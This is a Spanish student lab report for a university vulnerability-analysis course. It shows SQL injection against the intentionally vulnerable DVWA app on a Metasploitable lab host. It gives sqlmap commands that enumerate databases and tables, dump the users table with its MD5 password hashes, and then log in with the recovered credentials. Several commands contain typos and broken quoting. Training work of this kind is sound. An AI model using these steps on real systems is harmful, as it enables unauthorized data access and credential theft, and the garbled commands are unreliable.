Realizar ataques SQL Injection a DVWA

Asignatura Análisis de Vulnerabilidades Datos del alumno Fecha Apellidos: 02-08-2020 Nombre: Actividades Actividad:

Views 203 Downloads 1 File size 734KB

Report DMCA / Copyright

DOWNLOAD FILE

Recommend stories

Citation preview

Asignatura Análisis de Vulnerabilidades

Datos del alumno

Fecha

Apellidos: 02-08-2020 Nombre:

Actividades Actividad: Realizar ataques SQL Injection a DVWA En la siguiente actividad debes descargar WebGoat, para realizar ataques utilizando la técnica de SQL injection con la aplicación SQLMap (instalada en Kali). Para realizar este trabajo debes explicar todos los pasos a seguir para realizar los ataques SQL Inject con SQLmap. Extensión máxima: 10 páginas (Georgia 11 e interlineado 1,5).

TEMA 3 – Actividades

© Universidad Internacional de La Rioja, S. A. (UNIR)

Asignatura Análisis de Vulnerabilidades

Datos del alumno

Fecha

Apellidos: 02-08-2020 Nombre:

Desarrollo de Actividad:

Para la siguiente actividad es necesario contar con 2 equipos (Kali Linux y Metasploitable)

Verificamos las IP´s de ambos equipos y validamos que exista comunicación.

TEMA 3 – Actividades

© Universidad Internacional de La Rioja, S. A. (UNIR)

Asignatura Análisis de Vulnerabilidades

Datos del alumno

Fecha

Apellidos: 02-08-2020 Nombre:

Desde el equipo Linux, accedemos vía web a la Ip de la máquina (Metasploitable y escogemos la aplicación DVWA.

TEMA 3 – Actividades

© Universidad Internacional de La Rioja, S. A. (UNIR)

Asignatura Análisis de Vulnerabilidades

Datos del alumno

Fecha

Apellidos: 02-08-2020 Nombre:

Verificamos el acceso con las credenciales que son “admin” y “password”

Indicar cuáles son los parámetros vulnerables de la URL

TEMA 3 – Actividades

© Universidad Internacional de La Rioja, S. A. (UNIR)

Asignatura Análisis de Vulnerabilidades

Datos del alumno

Fecha

Apellidos: 02-08-2020 Nombre:

Obtener los nombres de las bases de datos disponibles

Ingresamos a la aplicación sqlmap de kali linux

Ejecutamos la siguiente sentencia para que nos muestre las bases de datos disponibles. sqlmap -–headers="UsersAgent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0)Gecko/20100101Firefox/54.0" –cookie="security=low" PHPSESSID=21ª5021843c8f7280a79c68b452ffce6" –u http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#" –-dbs

TEMA 3 – Actividades

© Universidad Internacional de La Rioja, S. A. (UNIR)

Asignatura Análisis de Vulnerabilidades

Datos del alumno

Fecha

Apellidos: 02-08-2020 Nombre:

Terminada la ejecución de la acción indicada, nos muestra 7 bases de datos encontradas:

Recuperar los nombres de las tablas de la base de datos dvwa. Para recuperar los nombres de la base de datos DVWA, ingresamos la sentencia: sqlmap -–headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0)Gecko/20100101Firefox/54.0"–cookie="security=low" PHPSESSID=21ª5021843c8f7280a79c68b452ffce6" –u http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#" –D dvwa –-tables

Nos muestra las 2 tablas de la base de datos DVWA.

TEMA 3 – Actividades

© Universidad Internacional de La Rioja, S. A. (UNIR)

Asignatura Análisis de Vulnerabilidades

Datos del alumno

Fecha

Apellidos: 02-08-2020 Nombre:

Recuperar el contenido de las tablas de la base de datos dvwa. Tabla guestbook: Utilizamos la siguiente sentencia para obtener el contenido de ésta tabla: sqlmap -–headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" –-cookie="security=low" PHPSESSID=21ª5021843c8f7280a79c68b452ffce6"–u http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#" –batch –dump –T guestbook –D dvwa

Contenido de tabla nos muestra lo siguiente:

Tabla users De igual forma se usa la misma sentencia, pero cambiamos el nombre de la tabla, así: sqlmap -–headers="Users-gent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0)Gecko/20100101Firefox/54.0"–cookie="security=low" PHPSESSID=21ª5021843c8f7280a79c68b452ffce6" –u http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#" –batch –dump –T users –D dvwa

TEMA 3 – Actividades

© Universidad Internacional de La Rioja, S. A. (UNIR)

Asignatura Análisis de Vulnerabilidades

Datos del alumno

Fecha

Apellidos: 02-08-2020 Nombre:

Además de mostrarnos el contenido, nos indica que el contenido de la tabla users tiene encriptación md5. El contenido de la tabla es el siguiente:

Comprobamos las contraseñas encontradas en la tabla anterior, ingresamos a la aplicación web:

Se verifica el acceso.

TEMA 3 – Actividades

© Universidad Internacional de La Rioja, S. A. (UNIR)